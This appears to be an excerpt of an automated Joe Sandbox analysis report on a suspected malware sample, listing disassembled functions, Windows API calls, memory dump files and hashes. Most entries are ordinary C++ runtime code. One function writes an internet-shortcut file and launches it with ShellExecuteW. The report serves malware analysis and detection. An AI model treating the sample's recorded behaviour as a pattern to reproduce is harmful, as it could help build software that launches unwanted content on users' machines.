                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00F64E3F,?,20001004,00000000,00000002,?,?,00F64441), ref: 00F676E3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                  • Opcode ID: 1d3d8ac90d032a073557c3c499d326061425b30c9a4732bc9df638043160e278
                                                                                                                                                                                                                                                  • Instruction ID: fa076f4e7b6642d4c5ef8aa99a6246f8958daf76d1a1181ef8979bf2e79e24d3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d3d8ac90d032a073557c3c499d326061425b30c9a4732bc9df638043160e278
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CE01A3250871CBBCB123F61DC08AAE7A26AF44764F104020FC05661218B768960BB96
                                                                                                                                                                                                                                                  Function 00F5353F Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00F53077), ref: 00F53544
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                  • Opcode ID: 33d7c7315265152b31a92f2edc54996a9b8a9848681d2394080f0b37e6e181cf
                                                                                                                                                                                                                                                  • Instruction ID: da9ef283c558d65ddf61a4fbe9c234be2727f83e79a584af42823740d934047a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33d7c7315265152b31a92f2edc54996a9b8a9848681d2394080f0b37e6e181cf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                  Function 00F32310 Relevance: 1.3, APIs: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C98: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52CA3
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C98: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52CE0
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00F32365
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C4E: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C4E: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 325507722-0
                                                                                                                                                                                                                                                  • Opcode ID: 0f4a5755ceda792a179dba776555fea6a576d226ade611dadbb51f4a51d1e04f
                                                                                                                                                                                                                                                  • Instruction ID: 0175c21f1521afc46fef7a891b76c4d6c3851a247717a518ba1c700a50ee0129
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f4a5755ceda792a179dba776555fea6a576d226ade611dadbb51f4a51d1e04f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD219CB0921608DBD350EF58EC05BE977B0EB36324F004319E825972E1F3756808BB52
                                                                                                                                                                                                                                                  Function 00F60A48 Relevance: .7, Instructions: 655COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                                  • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                                                                                                                  • Instruction ID: f5e1b77563629a4f9031f04cc2c7aa6ca7a058f5cc454c1f3c89c179755d7e2d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E32AC34E0021ADFCF28CF98C991ABEB7B5EF55314F284169DD45A7305DA32AE46DB80
                                                                                                                                                                                                                                                  Function 00F692A9 Relevance: .6, Instructions: 637COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7c80f69da2586a31788134cf1d1ff637f39bf68e53c2c04abeb3e4c3a423148f
                                                                                                                                                                                                                                                  • Instruction ID: b7b6568724645beba5fba9c8eadae0439f59ac61d9fed8c609fd2d85b1a33cfd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c80f69da2586a31788134cf1d1ff637f39bf68e53c2c04abeb3e4c3a423148f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D32F122D29F454DD7239634CC62379A28CEFB73D4F15D727E81AB5AA9EB3884C36101
                                                                                                                                                                                                                                                  Function 00F5A915 Relevance: .4, Instructions: 388COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 56f70f2eaafb2dd7f169aff675c4dc991a46e332bd82c4e4c88ac1b37ebf8247
                                                                                                                                                                                                                                                  • Instruction ID: 7f33276c634c95cd9529e5da94a5b3bfe0334d2c7ea9d3ce26b9bed6bbddf0c6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56f70f2eaafb2dd7f169aff675c4dc991a46e332bd82c4e4c88ac1b37ebf8247
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2E1EE30A00605CFCB24CF28C580A7AB7F1FF49322B244749DE569B690D734ED5AEB52
                                                                                                                                                                                                                                                  Function 00F6D8D5 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3471368781-0
                                                                                                                                                                                                                                                  • Opcode ID: 5c7f566d3d428003e1b64b9f3f1be23ae621736ad2d768a1532083a5e92b84f2
                                                                                                                                                                                                                                                  • Instruction ID: 9c9fdc2d181d570a80fb09e32ee220c078b45ddf3d2aca4e5912a391cf2d6f1e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c7f566d3d428003e1b64b9f3f1be23ae621736ad2d768a1532083a5e92b84f2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3B10675E007458BDB38EF24CC92BB7B3A8EF44318F14452DEA82C6585EB79E945EB10
                                                                                                                                                                                                                                                  Function 00F5C2CA Relevance: .2, Instructions: 158COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                                                                                                                  • Instruction ID: 7b4fcd279e828142535c6e40a837bff6785e1603005d0d0fc1048e4baaa3a28b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD517472E00219EFDF14CF99C951AEEBBB1EF88310F19C069E915AB201C7349E54DB91
                                                                                                                                                                                                                                                  Function 00F54920 Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                  • Instruction ID: 82a0b954b46c12b2a655464e25e4914ec426bd216faa725636215b3dc27fcbd2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F113F7760404143D604C52DC4BA5B7E395DBC633F72D4365CA914BF55D222B9CCB600
                                                                                                                                                                                                                                                  Function 00F6AD78 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                                                                                                                  • Instruction ID: 3dd350b22b103c57bf792065a4dabbc0cca527d159e15485bc0391bfd6858d78
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5E08C72911238EBCB14DB98CA0498AF3ECEB84B11B15049AF601E3500D674DE00EBD1
                                                                                                                                                                                                                                                  Function 00F62DCC Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                                                                                                                  • Instruction ID: 6e6e81255933d14ce5f632bb1196945cc361f761b642dea8321d157097e9ba09
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6C08C34400F0046CE2989108EB13A83354B791792F80058CC4430BA86C51EAC83FA01
                                                                                                                                                                                                                                                  Function 00F50116 Relevance: 30.3, APIs: 20, Instructions: 287COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F5011D
                                                                                                                                                                                                                                                  • collate.LIBCPMT ref: 00F50126
                                                                                                                                                                                                                                                    • Part of subcall function 00F4EDF2: __EH_prolog3_GS.LIBCMT ref: 00F4EDF9
                                                                                                                                                                                                                                                    • Part of subcall function 00F4EDF2: __Getcoll.LIBCPMT ref: 00F4EE5D
                                                                                                                                                                                                                                                  • __Getcoll.LIBCPMT ref: 00F5016C
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50180
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50195
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F501D3
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F501E6
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5022C
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50260
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5031B
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5032E
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5034B
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50368
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50385
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F502BD
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • numpunct.LIBCPMT ref: 00F503C4
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F503D4
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50418
                                                                                                                                                                                                                                                    • Part of subcall function 00F36330: LocalAlloc.KERNEL32(00000040,?,00F40E04,00000020,?,?,00F39942,00000000,80A20388,?,?,?,?,00F750DD,000000FF), ref: 00F36336
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5042B
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50448
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3717464618-0
                                                                                                                                                                                                                                                  • Opcode ID: 6e77e970c2613771671f229a03f8fbb4093420540f53e6d14ee3edb759d457b9
                                                                                                                                                                                                                                                  • Instruction ID: aa78346c2aa716e0a0439680fd1444c1d8fc99038c2461ebf04396bd0b60ef30
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e77e970c2613771671f229a03f8fbb4093420540f53e6d14ee3edb759d457b9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F191B671D012116BEB207BB44C46BBF7AA8EF417B1F108429FD4DA7282DE784905B7B2
                                                                                                                                                                                                                                                  Function 00F36600 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 319filememoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00F3667E
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F366D7
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F366E2
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F366FE
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F367DB
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F367E7
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00F749E5), ref: 00F3682F
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F3684A
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00F749E5), ref: 00F36867
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F36891
                                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00F368D8
                                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00F3692A
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F3695C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                                                                                                                                                                                                  • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                                                                                                                                                                                                  • API String ID: 2199533872-3004881174
